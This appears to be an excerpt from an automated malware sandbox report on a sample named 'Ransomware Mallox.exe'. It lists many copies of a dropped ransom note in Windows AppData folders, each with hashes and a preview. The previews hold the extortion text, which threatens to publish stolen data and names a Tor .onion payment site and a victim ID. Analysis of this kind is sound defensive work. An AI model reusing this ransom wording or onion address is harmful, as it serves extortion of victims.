                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\PeerDistRepub\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
